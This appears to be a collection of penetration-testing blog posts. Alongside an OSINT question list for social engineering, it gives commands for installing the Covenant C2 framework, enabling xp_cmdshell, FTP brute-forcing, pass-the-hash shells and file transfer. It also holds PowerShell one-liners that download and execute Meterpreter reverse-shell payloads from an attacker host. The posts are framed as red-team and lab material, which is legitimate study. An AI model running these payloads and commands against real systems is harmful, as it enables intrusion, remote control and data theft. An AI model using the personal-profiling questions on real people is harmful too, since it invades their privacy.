Tips & Tricks

Excellent OSINT Questions for Social Engineering Engagements

Please note that this list came from Christopher Hadnagy’s book, Social Engineering The Science of Human Hacking.


Questions for a Corporation:
How does the corporation use the internet?
How does the corporation use social media?
Does the corporation have policies in place for what its people can put on the internet?
How many vendors does that corporation have?
What vendors does the corporation use?
How does the corporation accept payments?
How does the corporation issue payments?
Does the corporation have call centers?
Where are HQ, Call Centers, or other branches located?
Does the corporation allow BYOD?
Is the corporation in one location or many?
Is there an org chart available?

Questions for an Individual:
What social media accounts does the person use?
What hobbies does the person have?
Where does the person vacation?
What are the person’s favorite restaurants?
What is the family history (sicknesses, businesses, and so on) of the person?
What is the person’s level of education? What did the person study? Where?
What is the person’s job role, including whether people work from home, for themselves, and who they report to?
Are there any other sites that mention the person (maybe they give speeches, post to forums, or are part of a club)?
Does the person own a house? If yes, what are the property taxes, liens, and so on?
What are the names of the person’s family members (as well as any of the previously mentioned info on those people)?

Pentesting, Tips & Tricks

Installing Covenant C2 on Windows

Covenant C2 is described by its authors as “A . NET command and control framework that aims to highlight the attack surface of . NET, make the use of offensive . NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.”

This post is meant to supplement a video that I uploaded to my YouTube channel.


Installing Prerequisites

To begin, we have some prerequisites to install. They both can be found at the following links. Both installers work well with default settings and just basic “Next, Next, Finish”.

https://dotnet.microsoft.com/download/dotnet-core/3.1

https://git-scm.com/download/win


Creating Windows Defender Exclusion

Once installed, let’s create a directory at the following location.

mkdir c:/opt

And then you can add the Exclusion in Windows Defender.


Downloading and Building Covenant

Launch Git as Administrator and run the following commands.

cd c:/opt
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant
dotnet run

Once its finished, you can access Covenant via https://127.0.0.1:7443

Tips & Tricks

Listing AD Group Membership of Multiple Users in PowerShell

I recently was on an engagement where I was able to successfully compromise a large list of user accounts. I wanted to leverage PowerShell to quickly see which groups these users are a part of to help me decide who to enumerate first.

I through the users into a text file and this is the PowerShell code I ended up using.

$users = Get-Content -path 'C:\tmp\users.txt'
foreach($user in $users){
write-host "Group Membership for: " $user
Get-ADPrincipalGroupMembership -Identity $user | Select name | ft -hidetableheaders
write-host "______________________________"
}

Tips & Tricks

Enabling XP_CMDSHELL in SQL Server

If you ever get access to SQL credentials, you may be able to use a tool to connect to it via commandline and execute system commands via “XP_CMDSHELL”. However, this feature is not always enabled by default.

We’ll start by connecting to our target w/ the following command.

sqsh -S <ipAddress> -U <user> -P <password>

And then we’ll run the following commands to enable XP_CMDSHELL.

EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go

At this point, we should be able to execute our commands.

xp_cmdshell '<command>'

Tips & Tricks

Enumerating FTP for Pentesting (Port 21)

Basic Enumeration

Attempt to connect anonymously by issuing the below command and specifying the following credentials; anonymous:anonymous.

ftp <ipAddress>

You can perform banner grabbing w/ the following Metasploit module.

use auxiliary/scanner/ftp/ftp_version

You can perform brute force with the following Metasploit module.

use auxiliary/scanner/ftp/ftp_login


Transferring Files

If you have valid credentials, you can use the following command to download all files recursively.

wget --mirror 'ftp://<username>:<password>@<ipAddress>

Tips & Tricks

Dealing w/ Gobuster “WildCard” and “Status Code” Errors

Have you ever encountered the following error within Gobuster?

Error: the server returns a status code that matches the provided options for non existing urls. http://ipaddress/9b9353c0-3de2-4df5-abd7-0f618e4d70ab => 200. To force processing of Wildcard responses, specify the ‘–wildcard’ switch

Likely, the webserver you’re attacking is configured to always respond with a 200 response code. For example, let’s look at BART on Hack The Box.

Let’s see if we can extract anything with Curl. We’ll start by sending a request out to the default page. We see that it returns a 302 redirect to forum.bart.htb.

curl -vvv 10.10.10.81

Let’s try a request to a page we know doesn’t exist, and we are returned a success 200 message that displays an image. This explains why Gobuster was returning a 200 message on each directory.

We can confirm this by browsing to the page and looking at the image.

Armed with this information, we know that 200 response codes are bad, but other response codes (such as a 302) indicate a directory is present. Let’s rerun our Gobuster command, but we’ll specify which response codes we want returned.

Checking the help page, we can see that Gobuster accepts the following response codes; “200,204,301,302,307,401,403”.

So our command will look like this.

gobuster dir -u http://10.10.10.81 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403"

And with that command running, we eventually start to get some real results back.

Tips & Tricks

Using Unicorn.py to Automate PowerShell Meterpeter Shells

There’s an awesome tool on Github you can download by running the following command.

sudo git clone https://github.com/trustedsec/unicorn.git

Running the Python script will generate some output that you can copy/paste to create the necessary payload.

python unicorn.py

For example, I can quickly generate a PowerShell reverse shell payload by running the following command.

sudo python unicorn.py windows/meterpreter/reverse_https <attackerIP> 443

That command created two files.

powershell_attack.txt – Contains my malicious PowerShell payload.
unicorn.rc – Will allow us to easily spin up a listener in Metasploit.

Let’s copy both of these files and move them over to where we want them. I will place powershell_attack.txt in a directory that I’m hosting up w/ a webserver, and then I’ll place unicorn.rc into a directory that I want to start my Metasploit listener within.

I’ll start my Metasploit listener with the following code.

sudo msfconsole -r unicorn.rc

And then we just need to execute the following PowerShell code on the victim.

powershell "IEX(New-Object Net.WebClient).downloadString('http://<attackerIP>/powershell_attack.txt')"

Tips & Tricks

Popping Remote Shells w/ winexe & pth-winexe on Windows

If you’re able to come across credentials or NTLM hashes for a Windows box that has SMB enabled, you may be able to leverage the tool called winexe to gain a shell. If you have captured a NTLM hash, say from dumping a SAM database, you may be able to pass-the-hash.


Basic syntax w/ credentials.

winexe -U <domain/username>%<password> //<targetIP> cmd.exe

Basic syntax w/ NTLM hash (pass the hash technique).

pth-winexe -U <domain/username>%<hash> //<targetIP> cmd.exe

Additional details about the command can be found here. https://tools.kali.org/maintaining-access/winexe

Tips & Tricks

Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.


Uploading and Hosting Files

Python Web Server

The following will start a webserver in the present working directory using Python2.

python -m SimpleHTTP Server 80

The following will start a webserver in the present working directory using Python3.

python3 -m http.server 80


Impacket SMB Server

You can download Impacket from Github.

We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory.

mkdir smb

impacket-smbserver <sharename> `<path>`

Then we can mount this file share in PowerShell from the other side.

New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>

And change into the new drive.

cd <ShareName>:


Downloading Files

PowerShell

The following will download and store a remote file to disk.

Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"

The following will download and automatically execute the remote PowerShell script when ran from a command prompt.

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')


CertUtil

The following will download and store a remote file to disk.

certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe


Windows Defender

The following will download and store a remote file to disk.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]


Transferring with SSH

To copy a file from B to A while logged into B:

scp /path/to/file username@a:/path/to/destination

To copy a file from B to A while logged into A:

scp username@b:/path/to/file /path/to/destination